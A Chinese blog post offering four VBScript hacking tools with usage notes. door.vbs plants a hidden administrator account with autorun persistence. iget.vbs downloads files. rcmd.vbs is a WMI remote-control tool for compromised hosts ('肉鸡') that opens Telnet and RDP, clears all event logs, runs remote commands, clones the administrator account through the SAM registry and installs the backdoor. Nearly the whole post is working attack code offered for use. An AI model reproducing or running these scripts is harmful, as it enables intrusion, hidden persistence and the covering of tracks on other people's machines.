黑客必须要知道的几个vbs文件代码

软件设计 2017-03-31

1. door.vbs

'*************** 

'door.vbs by 黑嘿黑

'***************

dim wsh,FA,FSO

set fso=CreateObject("Scripting.FileSystemObject") 

Set FA= FSO.GetFile(WScript.scriptFullName)

FA.Attributes =34

set wsh=CreateObject("WScript.Shell")

wsh.run "net user IUSE_SERVER xyhack.91i.net /add",0,true

wsh.run "net localgroup administrators IUSE_SERVER /add" ,0,true

wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32",""&FA&""

wsh.Regwrite 

"HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue",0,"REG_DWORD"

wsh.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun",""&FA&""

wsh.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun",""&FA&""

功能:添加不死帐号(随cmd启动而启动),在win下彻底隐藏。

使用:直接运行。

2. ntlm.vbs

'*************** 

'ntlm.vbs by 黑嘿黑

'***************

dim wsh 

set wsh=CreateObject("WScript.Shell") 

wsh.regwrite "HKLM\Software\Microsoft\TelnetServer\1.0\NTLM",WScript.Arguments(0),"REG_DWORD" 

wsh.regwrite "HKLM\Software\Microsoft\TelnetServer\1.0\TelnetPort",WScript.Arguments(1),"REG_DWORD" 

功能:自定义telnet的ntml和端口。

使用:D:\>ntml.vbs 1 999

3. iget.vbs

'*************************** 

'iget.vbs Mod by 黑嘿黑

'***************************

Set xPost = CreateObject("Microsoft.XMLHTTP") 

xPost.Open "GET",LCase(WScript.Arguments(0)),0

xPost.Send()

Set sGet = CreateObject("ADODB.Stream")

sGet.Mode = 3

sGet.Type = 1

sGet.Open()

sGet.Write(xPost.responseBody)

sGet.SaveToFile LCase(WScript.Arguments(1)),2

功能:命令行下下载http文件。

使用:D:\>iget.vbs http://xyhack.91i.net/vbs.rar vbs.rar

4. rcmd.vbs

'*************** 

'rcmd.vbs by 黑嘿黑

'***************

on error resume next

set outstreem=wscript.stdout

set instreem=wscript.stdin

if (lcase(right(wscript.fullname,11))="wscript.exe") then

set objShell=wscript.createObject("wscript.shell")

objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))

end if

if wscript.arguments.count<3 then

usage()

wscript.echo "Not enough parameters."

wscript.quit

end if 

ipaddress=wscript.arguments(0)

username=wscript.arguments(1)

password=wscript.arguments(2)

usage()

outstreem.write "Conneting "&ipaddress&"...."

set objlocator=createobject("wbemscripting.swbemlocator") '20

set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)

objswbemservices.security_.privileges.add 23,true

objswbemservices.security_.privileges.add 18,true

objswbemservices.security_.privileges.add 7,true

objswbemservices.security_.privileges.add 11,true

if errornumber<>0 then

wscript.echo "Error!"

call main()

else

wscript.echo "OK!"

end if

call main()

'***********************************************************

function door()

outstreem.write "Creating the blankdoor .."

set objinstproc=objswbemservices.get("win32_process")

cmddoor="cmd /c echo dim wsh,FA,FSO,t>%windir%\system32\svrer.vbs" _

&"&& echo set fso=CreateObject(""Scripting.FileSystemObject"") >>%windir%\system32\svrer.vbs" _

&"&& echo Set FA= FSO.GetFile(WScript.scriptFullName)>>%windir%\system32\svrer.vbs" _

&"&& echo FA.Attributes =34>>%windir%\system32\svrer.vbs" _

&"&& echo set t=fso.CreateTextFile(""%windir%\system32\SYSTEM.bat"",true)>>%windir%\system32\svrer.vbs" _

&"&& echo t.WriteLine(""net user IUSE_SERVER xyhack.91i.net /add"")>>%windir%\system32\svrer.vbs" _

&"&& echo t.WriteLine(""net localgroup administrators IUSE_SERVER /add"")>>%windir%\system32\svrer.vbs" _ 

&"&& echo t.WriteLine(""Attrib +h %windir%\system32\SYSTEM.bat"")>>%windir%\system32\svrer.vbs" _

&"&& echo t.Close>>%windir%\system32\svrer.vbs"_

&"&& echo set wsh=CreateObject(""WScript.Shell"")>>%windir%\system32\svrer.vbs" _

&"&& echo wsh.run ""net user IUSE_SERVER xyhack.91i.net /add"",0,true>>%windir%\system32\svrer.vbs" _

&"&& echo wsh.run ""net localgroup administrators IUSE_SERVER /add"" ,0,true>>%windir%\system32\svrer.vbs" _

&"&& echo wsh.Regwrite 

""HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs" _

&"&& echo wsh.Regwrite 

""HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"",0,""REG_DWORD"">>%win

dir%\system32\svrer.vbs" _

&"&& echo wsh.regwrite ""HKEY_LOCAL_MACHINE\Software\Microsoft\Command 

Processor\AutoRun"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs" _

&"&& echo wsh.regwrite ""HKEY_CURRENT_USER\Software\Microsoft\Command 

Processor\AutoRun"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs" _

&"&& echo wsh.run ""cmd /c at 20:00,20:10,20:20,20:30 %windir%\system32\SYSTEM.bat"",0,true 

>>%windir%\system32\svrer.vbs"

objinstproc.create(cmddoor)

showerror(err.number)

Wscript.Sleep(1500)

outstreem.write "Runing the blankdoor .."

objinstproc.create("cmd /c cscript %windir%\system32\svrer.vbs")

showerror(err.number)

call main()

end function

'***********************************************************

function ca()

Wscript.Echo "enter the causername:"

causername=WScript.StdIn.Readline()

Wscript.Echo "enter the capassword:"

capassword=WScript.StdIn.Readline()

outstreem.write "Getting SID of "&causername&" ...."

set colinstsid=objswbemservices.execquery("select * from win32_useraccount where name="&chr(34)&causername&chr(34))

for each objinstsid in colinstsid

strsid=objinstsid.sid

sidflag=right(strsid,len(strsid)-instrrev(strsid,"-"))

strflag=cstr(hex(sidflag))

regname=string(8-len(strflag),"0")&strflag

next

if strsid="" then

wscript.echo "Error."&vbcrlf&"Username is not exist."

call main()

else

wscript.echo "OK!"

end if

outstreem.write "Prepairing .."

set objinstproc=objswbemservices.get("win32_process")

showerroronly(err.number)

cmdline="cmd /c echo set oreg=getobject(""winmgmts:root\default:stdregprov"")>%temp%\ca.vbs" _

&"&& echo oreg.getbinaryvalue ^&h80000002,""SAM\SAM\Domains\Account\Users\000001F4"",""F"",uvalue >>%temp%\ca.vbs" _

&"&& echo oreg.setbinaryvalue ^&h80000002,""SAM\SAM\Domains\Account\Users\"?name&""",""F"",uvalue >>%temp%\ca.vbs" _

&"&& echo set sh=createobject(""wscript.shell"")>>%temp%\ca.vbs" _

&"&& echo sh.regwrite ""HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings\caflag"",""1"" >>%temp%\ca.vbs"

objinstproc.create(cmdline)

showerroronly(err.number)

cmdline="cmd /c echo atime=time>%temp%\getsys.vbs" _

&"&& echo set sh=createobject(""wscript.shell"")>>%temp%\getsys.vbs" _

&"&& echo sh.run ""cmd /c at 23:59 cscript %temp%\ca.vbs"",0,true >>%temp%\getsys.vbs" _

&"&& echo sh.run ""cmd /c time 23:58:59.90"",0,true >>%temp%\getsys.vbs" _

&"&& echo wscript.sleep(1100)>>%temp%\getsys.vbs" _

&"&& echo sh.run ""cmd /c time ""^&atime,0,true >>%temp%\getsys.vbs"

objinstproc.create(cmdline)

showerror(err.number)

outstreem.write "Processing ."

set colinstsvr=objswbemservices.execquery("select * from win32_service where name='schedule'")

showerroronly(err.number)

for each objinstsvr in colinstsvr

flag1=0

flag2=0

if objinstsvr.startmode="Disabled" then

objinstsvr.changestartmode("Manual")

flag1=1

end if

if objinstsvr.started=flase then

errnumber=objinstsvr.startservice()

flag2=1

end if

showerroronly(err.number)

objinstproc.create("cmd /c cscript %temp%\getsys.vbs")

showerroronly(err.number)

set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")

for i=1 to 20

objinstreg.getstringvalue &h80000002,"SOFTWARE\Microsoft\Windows Script Host\Settings","caflag",svalue

if svalue="1" then

exit for

else

wscript.sleep(500)

end if

next

objinstproc.create("net user "&causername&" "&capassword)

if flag1 then objinstsvr.changestartmode("Disabled")

if flag2 then objinstsvr.stopservice()

next

if svalue<>"1" then

wscript.echo "Error."&vbcrlf&"Waiting time out."

else

showerror(err.number)

end if

outstreem.write "Clean Up .."

objinstproc.create("cmd /c del %temp%\ca.vbs")

showerroronly(err.number)

objinstproc.create("cmd /c del %temp%\getsys.vbs")

showerroronly(err.number)

if svalue="1" then objinstreg.deletevalue &h80000002,"SOFTWARE\Microsoft\Windows Script Host\Settings","caflag"

showerror(err.number)

call main()

end function

function showerroronly(errornumber)

if errornumber Then

wscript.echo "Error 0x"&cstr(hex(err.number))&" ."

if err.description <> "" then

wscript.echo "Error description: "&err.description&"."

end if

call main()

else

outstreem.write "."

end if

end function

'***********************************************************

function share()

Wscript.Echo string(18,"-")

Wscript.Echo "0.返回CMD> ="

wscript.echo "1.列出共享信息: ="

Wscript.Echo "2.创建共享 ="

Wscript.Echo "3.删除共享 ="

Wscript.Echo string(18,"-")

Wscript.Echo "please chose the parameter:"

parameters=WScript.StdIn.Readline()

Select Case parameters

case "quit" , "0"

main()

case "list" , "1"

listshare()

case "open" , "2" '40

openshare()

case "close" ,"3"

closeshare()

end Select 

end function

function listshare()

outstreem.write "Listing the Netshare from "&ipaddress&"...."

Set colShares = objswbemservices.ExecQuery("Select * from Win32_Share")

showerror(err.number) '50

wscript.echo _

("Caption"&chr(9)&chr(9)&"Name: "&chr(9)&chr(9)&"Path") 

For each objShare in colShares 

wscript.echo _

(objShare.Caption&chr(9)&objShare.Name &chr(9)&chr(9)&objShare.Path)

Next

wscript.echo vbcrlf&"All Share have been listed Successfully!"

call share()

end function

function openshare()

wscript.echo "Enter the path:" '70

path=WScript.StdIn.Readline()

wscript.echo "Enter the name:"

sname=WScript.StdIn.Readline()

Const FILE_SHARE = 0

Const MAXIMUM_CONNECTIONS = 25

Set objNewShare = objswbemservices.Get("Win32_Share")

errReturn = objNewShare.Create _

(path, sname, FILE_SHARE, _

MAXIMUM_CONNECTIONS, "默认共享")

wscript.echo "Then Share have been Ceated Successfully!"

call share()

end function

function closeshare()

wscript.echo "Plese Enter The name:"

kname=WScript.StdIn.Readline()

outstreem.write "killing the "&kname&" ...."

Set colShares = objswbemservices.ExecQuery _

("Select * from Win32_Share Where Name ="&"'"&kname&"' ")

For Each objShare in colShares

objShare.Delete

Next

showerror(err.number)

call share()

end function

'***********************************************************

function listsvr()

outstreem.write "Listing the Service from "&ipaddress&"...."

Set colListOfServices = objswbemservices.ExecQuery _

("Select * from Win32_Service")

showerror(err.number)

wscript.echo _

("Name"&chr(9)&chr(9)&"State"&chr(9)&chr(9)&"Mode"&chr(9)&"Path Name ") 

For Each objService in colListOfServices 

if len(objService.name)<8 then

strname=objService.name&chr(9)

else

strname=objService.name

end if

wscript.echo _

(strname&chr(9)&objService.State&chr(9)&chr(9)&objService.StartMode&chr(9)&objService.PathName)

Next

wscript.echo vbcrlf&"All Services have been listed Successfully!"

call main()

end function

'************************************************************

function reboot()

outstreem.write "Now, restarting target...."

strwqlquery="select * from win32_operatingsystem where primary='true'"

set colinstances=objswbemservices.execquery(strwqlquery)

for each objinstance in colinstances

objinstance.win32shutdown(6)

next

showerror(err.number)

call main()

end function

'*************************************************************

function inf()

outstreem.write "Getting Infomation from "&ipaddress&"...."

set obj1=objget("win32_computersystem")

showerror(err.number)

wscript.echo ""&vbcrlf

set obj2=objget("win32_operatingsystem")

set col3=objswbemservices.instancesof("win32_processor")

set obj4=objget("win32_logicalmemoryconfiguration")

set obj5=objget("win32_bios")

set obj6=objget("win32_displayconfiguration")

set col7=objswbemservices.instancesof("win32_diskdrive")

set col8=objswbemservices.instancesof("win32_logicaldisk")

set col9=objswbemservices.instancesof("win32_networkadapterconfiguration")

set col10=objswbemservices.instancesof("win32_quickfixengineering")

wnl "OS Info :"

wnl " Computer Name : "&obj1.name

wnl " User Name : "&obj1.username

wnl " Domain : "&obj1.domain

domainrole=""

select case obj1.domainrole

case 0

domainrole="Workstation"

case 1

domainrole="Member Workstation"

case 2

domainrole="Server"

case 3

domainrole="Member Server"

case 4

domainrole="Backup Domain Controller"

case 5

domainrole="Main Domain Controller"

end select

with obj2

wnl " Domain Role : "&domainrole

wnl " Caption : "&.caption

wnl " Organization : "&.organization

wnl " Registered User : "&.registereduser

wnl " Install Date : "&timeformat(.installdate)

wnl " Last BootUp Time : "&timeformat(.lastbootuptime)

wnl " Windows Directory : "&.windowsdirectory

wnl " System Directory : "&.systemdirectory

wnl " Boot Device : "&.bootdevice

wnl " Country Code : "&.countrycode

wnl " CSName : "&.csname

wnl " Description : "&.description

wnl " Manufacturer : "&.manufacturer

wnl " Serial Number : "&.serialnumber

wnl " Version : "&.version

wnl " System Type : "&obj1.systemtype

wnl " System Startup Delay : "&obj1.systemstartupdelay&"s"

wnl " System Startup Options : "&obj1.systemstartupoptions(0)

for i=1 to ubound(obj1.systemstartupoptions)

wnl space(28)&obj1.systemstartupoptions(i)

next

end with

wnl vbcrlf&"Processor Info :"

wnl " Number Of Processors : "&obj1.numberofprocessors

for each obj3 in col3

with obj3

wnl " Device ID : "&.deviceid

wnl " Name : "&.name

wnl " Current Clock Speed : "&.currentclockspeed&"MHz"

wnl " Description : "&.description

wnl " Ext Clock : "&.extclock&"MHz"

wnl " L2 Cache Size : "&.l2cachesize&"KB"

wnl " L2 Cache Speed : "&.l2cachespeed&"MHz"

wnl " Processor Id : "&.processorid

wnl " Manufacturer : "&.manufacturer

wnl " Socket Designation : "&.socketdesignation

wnl " Address Width : "&.addresswidth&"Bit"

wnl " Data Width : "&.datawidth&"Bit"

end with

next

with obj4

wnl vbcrlf&"Memory Info :"

wnl " Total Physical Memory : "&cint(.totalphysicalmemory/1024)&"MB"

wnl " Free Physical Memory : "&cint(obj2.freephysicalmemory/1024)&"MB"

wnl " Total PageFile Space : "&cint(.totalpagefilespace/1024)&"MB"

wnl " Total Virtual Memory : "&cint(.totalvirtualmemory/1024)&"MB"

wnl " Available Virtual Memory : "&cint(.availablevirtualmemory/1024)&"MB"

end with

wnl vbcrlf&"BIOS Info :"

wnl " Description : "&obj5.description

wnl " Current Language : "&obj5.currentlanguage

wnl " Version : "&obj5.version

wnl " Manufacturer : "&obj5.manufacturer

with obj6

wnl vbcrlf&"Display Configuration :"

wnl " Caption : "&.caption

wnl " Device Name : "&.devicename

wnl " Driver Version : "&.driverversion

wnl " Display Frequency : "&.displayfrequency&"Hz"

wnl " Bits Per Pel : "&.bitsperpel&"Bit"

wnl " Pels : "&.pelswidth&" x "&.pelsheight

end with

wnl vbcrlf&"Disk Info :"

for each obj7 in col7

with obj7

wnl " DeviceID : "&.deviceid

wnl " Caption : "&.caption

wnl " Interface Type : "&.interfacetype

wnl " SCSI Bus : "&.scsibus

wnl " SCSI Logical Unit : "&.scsilogicalunit

wnl " SCSI Port : "&.scsiport

wnl " SCSI TargetId : "&.scsitargetid

wnl " Sectors Per Track : "&.sectorspertrack&"KB"

wnl " Partitions : "&.partitions

wnl " Size : "&sizeformat(.size)

end with

next

str=" Volume"+space(2)+"Type"+space(8)+"Format"+space(4)

str=str+"Size"+space(6)+"Free"+space(12)+"Label"

wnl str

for each obj8 in col8

with obj8

drivetype=""

select case .drivetype

case 0

drivetype="Unknow"

case 1

drivetype="NoRootDir"

case 2

drivetype="Removable"

case 3

drivetype="Fixed"

case 4

drivetype="Network"

case 5

drivetype="CD-ROM"

case 6

drivetype="RAM"

end select

strpercent=""

if .size<>"" and .freespace<>"" then

strpercent=" ("&formatpercent(.freespace/.size,0)&")"

end if

str=" "&wsp(.caption,8)&wsp(drivetype,12)&wsp(.filesystem,10)&wsp(sizeformat(.size),10)

str=str&wsp(sizeformat(.freespace)&strpercent,16)&.volumename

wnl str

end with

next

wnl vbcrlf&"NIC Informaton :"

for each obj9 in col9

with obj9

if .IPEnabled then

wnl " Index : "&.index

wnl " Description : "&.description

wnl " DHCP Enabled : "&.dhcpenabled

wnl " DHCP Server : "&.dhcpserver

wnl " DNS Host Name : "&.dnshostname

wnl " DNS Server Search Order : "&wfl(.dnsserversearchorder)

wnl " WINS Primary Server : "&.winsprimaryserver

wnl " IP Address : "&wfl(.ipaddress)

wnl " MAC Address : "&.macaddress

wnl " Default IP Gateway : "&wfl(.defaultipgateway)

wnl " IP Subnet : "&wfl(.ipsubnet)

wnl " IP Filter Security Enabled : "&.ipfiltersecurityenabled

wnl " IPSec Permit IP Protocols : "&wfl(.ipsecpermitipprotocols)

wnl " IPSec Permit TCP Ports : "&wfl(.ipsecpermittcpports)

wnl " IPSec Permit UDP Ports : "&wfl(.ipsecpermitudpports)

end if

end with

next

wnl vbcrlf&"Hot Fixes Info :"

for each obj10 in col10

wnl " Hot Fix ID : "&obj10.hotfixid

wnl " Fix Comments : "&obj10.fixcomments

wnl " Install Date : "&obj10.installdate

wnl " Service Pack In Effect : "&obj10.servicepackineffect

next

wnl vbcrlf&"Applications :"

set objswb1=objlocator.connectserver(ipaddress,"root/default",username,password)

set obj11=objswb1.get("stdregprov")

HKLM=&h80000002

keypath="SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\"

obj11.enumkey HKLM,keypath,keyarray

redim str(ubound(keyarray)+1)

j=0

for i=0 to ubound(keyarray)

obj11.getstringvalue HKLM,keypath+keyarray(i),"displayname",strvalue

if strvalue<>"" then

str(j)=strvalue

j=j+1

end if

next

if j>1 then

for i=0 to j-1

for k=0 to j-i-1

if strcomp(str(k),str(k+1),1)=1 then

strtemp=str(k+1)

str(k+1)=str(k)

str(k)=strtemp

end if

next

next

end if

for i=0 to j-1

wnl " "&str(i)

next

wscript.echo ""&vbcrlf

wscript.echo "The Infomation from &ipaddress& had been listed Successfully!"

call main()

end function

sub wnl(msg)

wscript.echo msg

if isobject(of) then

on error resume next

of.writeline msg

showerror()

on error goto 0

end if

end sub

function wfl(byref obj)

str=""

for i=0 to ubound(obj)

str=str&obj(i)&" "

next

wfl=str

end function

function wsp(msg,num)

if msg<>"" then

msg=left(msg,num-1)

wsp=msg&space(num-len(msg))

else

wsp=space(num)

end if

end function

function timeformat(msg)

timeformat=left(msg,4)&"/"&mid(msg,5,2)&"/"&mid(msg,7,2)&" "&mid(msg,9,2)&":"&mid(msg,11,2)&":"&mid(msg,13,2)

end function

function sizeformat(msg)

if msg<>"" then

size=msg/1048576

if size>1024 then

sizeformat=round(size/1024,2)&"GB"

else

sizeformat=round(size,1)&"MB"

end if

end if

end function

function objget(msg)

set col=objswbemservices.instancesof(msg)

for each objx in col

set obj=objx

next

set objget=obj

end function

'******************************************

function command()

wscript.echo "Plese Enter The Command:"

call run()

end function

function run()

strcmdline=WScript.StdIn.Readline()

if strcmdline="exit" or strcmdline="quit" or strcmdline="0" then

call main()

end if

outstreem.write "Running the command ...."

set objinstance=objswbemservices.get("win32_process")

set objmethod=objinstance.methods_("create")

set objinparam=objmethod.inparameters.spawninstance_()

objinparam.commandline=strcmdline

set objoutparam=objinstance.execmethod_("create",objinparam)

if objoutparam.returnvalue<>0 then

wscript.echo "Error!"

call command()

else

wscript.echo "OK!"

end if

wscript.echo "The Process ID is "&objoutparam.processid

wscript.echo "Runing command:"&strcmdline&". to "&ipaddress&" Successfully!"&vbcrlf 

call command()

end function

'*******************************************

function pslist()

outstreem.write "Listing process...."

set colinstances=objswbemservices.execquery("select * from win32_process")

showerror(err.number)

wscript.echo vbcrlf&"Name"&chr(9)&chr(9)&"Pid"&chr(9)&"ExecutablePath"

for each objinstance in colinstances

if len(objinstance.name)<8 then

strname=objinstance.name&chr(9)

else

strname=objinstance.name

end if

wscript.echo strname&chr(9)&objinstance.handle&chr(9)&objinstance.executablepath

next

wscript.echo vbcrlf&"All process have been listed Successfully!"

call main()

end function

'*****************************************

function pskill()

wscript.echo "plese enter the process's id:"

strprocess=WScript.StdIn.Readline()

outstreem.write "Killing id="&strprocess&" process...."

set objinstance=objswbemservices.get("win32_process.handle="&"'"&strprocess&"'")

if vartype(objinstance)<>vbobject then

wscript.echo vbcrlf&"Specified process is not exist."

call main()

else

set objmethod=objinstance.methods_("terminate")

set objinparam=objmethod.inparameters.spawninstance_()

objinparam.reason=0

set objoutparam=objinstance.execmethod_("terminate",objinparam)

showerror(objoutparam.returnvalue)

wscript.echo "The process's id="&strprocess&" have been killed Successfully!"

end if

call main()

end function

'********************************************************

function telnet()

outstreem.write "Querying state of telnet server...."

set objswbemservices=objlocator.connectserver(ipaddress,"root\cimv2",username,password)

set colinstances=objswbemservices.execquery("select * from win32_service where name='tlntsvr'")

showerror(err.number)

for each objinstance in colinstances

if objinstance.startmode="Disabled" then

outstreem.write "Telnet server has been disabled. Now changeing start mode to manual...."

set objmethod=objinstance.methods_("changestartmode")

set objinparam=objmethod.inparameters.spawninstance_()

objinparam.startmode="Manual"

set objoutparam=objinstance.execmethod_("changestartmode",objinparam)

showerror(objoutparam.returnvalue)

end if

outstreem.write "Changeing state...."

if objinstance.started=true then

intstatus=objinstance.stopservice()

showerror(intstatus)

wscript.echo "Target telnet server has been STOP Successfully."

else

showerror(intstatus)

wscript.echo "plese enter the ntlm:"

ntlm=WScript.StdIn.Readline()

wscript.echo "plese enter the port:"

port=WScript.StdIn.Readline()

if not isnumeric(ntlm) or ntlm<0 or ntlm>2 then

wscript.echo "The value of NTML is wrong."

call main()

end if

if not isnumeric(port) then

wscript.echo "The value of port is wrong."

main()

end if

set objswbemservices1=objlocator.connectserver(ipaddress,"root/default",username,password)

outstreem.write "Setting NTLM="&ntlm&"...."

set objinstance1=objswbemservices1.get("stdregprov")

set objmethod=objinstance1.methods_("SetDWORDvalue")

set objinparam=objmethod.inparameters.spawninstance_()

objinparam.hdefkey=&h80000002

objinparam.ssubkeyname="SOFTWARE\Microsoft\TelnetServer\1.0"

objinparam.svaluename="NTLM"

objinparam.uvalue=ntlm

set objoutparam=objinstance1.execmethod_("SetDWORDvalue",objinparam)

showerror(objoutparam.returnvalue)

outstreem.write "Setting port="&port&"...."

objinparam.svaluename="TelnetPort"

objinparam.uvalue=port

set objoutparam=objinstance1.execmethod_("SetDWORDvalue",objinparam)

showerror(objoutparam.returnvalue)

intstatus=objinstance.startservice()

wscript.echo "Target telnet server has been START Successfully!"

wscript.echo "Now, you can try: telnet "&ipaddress&" "&port&", to get a shell."

end if

next

call main()

end function

'********************************************************

function rs()

outstreem.write "Checking The OS Type ...."

set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem")

for each objinstoscaption in colinstoscaption

if instr(objinstoscaption.caption,"Server")>0 then

wscript.echo "OK!"

else 

wscript.echo "OK!"

wscript.echo "OS Type is "&objinstoscaption.caption

wscript.echo "you cann't open terminal services,canceling...."&chr(13) '60

call main()

end if 

next

wscript.echo "plese enter the port:"

port=WScript.StdIn.Readline()

if not isnumeric(port) or port<1 or port>65000 then '50

wscript.echo "The number of port is error." 

call main()

end if

outstreem.write "Writing into registry ...."

set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")

HKLM=&h80000002

with objinstreg

.createkey ,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"

.setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0 '70

.createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"

.setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1 

.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1

.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2

.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2

.setstringvalue HKLM,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1"

.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port

end with

showerror(err.number)

wscript.echo "Now, you need to reboot target!"

wscript.echo "Do you want to reboot target now ?[y/n]"

strcancel=WScript.StdIn.Readline()

if strcancel="n" then 

wscript.echo "you need to reboot target then!!"

call main() 

else 

call reboot()

end if

wscript.echo "You can logon terminal services on "&port&" later,Good luck!"

call main() 

end Function

'**************************************************************

function clog()

outstreem.write "Clearing all logs...."

strwqlquery="select * from Win32_NTEventLogFile"

set colinstances=objswbemservices.execquery(strwqlquery,"wql",&h20)

for each objinstance in colinstances

if objinstance.cleareventlog()<>0 then

wscript.echo "Error!" '100

call main()

end if

next

wscript.echo "OK!"

wscript.echo "All logs have been cleared Successfully!"

call main()

end function

'***************************************************************

function showerror(errornumber)

if errornumber Then

wscript.echo "Error 0x"&cstr(hex(err.number))&" ."

if err.description <> "" then

wscript.echo "Error description: "&err.description&"."

end if

call main()

else

wscript.echo "OK!"

end if

end function

'*****************************************************************

function usage()

wscript.echo string(79,"*")

wscript.echo "RCMD v1.05"

wscript.echo "Remote execution Script, by 黑嘿黑"

wscript.echo "Welcome to visite www.xyhack.91i.net"

wscript.echo "QQ:123230273 E-mail:[email protected]"

wscript.echo "Usage:"

wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password "

wscript.echo "Then chose the command>"

wscript.echo string(79,"*")

end function

'**********************************************************

function main()

wscript.echo ""

wscript.echo "Now chose the command>"

wscript.echo "0.quit 退出脚本"

wscript.echo "1.telnet 远程开/关telnet"

wscript.echo "2.3389 远程开3389"

wscript.echo "3.clog 远程删除所有日志"

wscript.echo "4.getf 获取肉鸡系统信息"

wscript.echo "5.pslist 例出进程"

wscript.echo "6.pskill 删除进程"

wscript.echo "7.command 远程执行DOS命令"

wscript.echo "8.reboot 远程重启肉鸡"

wscript.echo "9.slist 例出远程肉鸡上的服务信息"

wscript.echo "A.Share 1.列出共享 2.创建共享 3.删除共享"

wscript.echo "B.ca 克隆帐号"

wscript.echo "C.Door 种植后门"

wscript.echo string(79,"*")

wscript.echo "CMD>"

cmd=WScript.StdIn.Readline() 

wscript.echo ""

Select Case cmd

case "telnet" , "1"

telnet()

case "3389" , "2"

rs()

case "clog" , "3"

clog()

case "getf" , "4"

inf()

case "psl" , "pslist" , "5"

pslist()

case "psk" , "pskill" , "6"

pskill()

case "cmd" , "command" , "7"

command()

case "reboot" , "8"

reboot()

case "slist" , "9"

list listsvr()

case "share" , "10" ,"a" ,"A"

share()

case "B" , "b" , "11"

ca()

case "C" , "c" , "12"

door()

case "quit" , "0"

wscript.quit

end select

end function

标签: 

相关推荐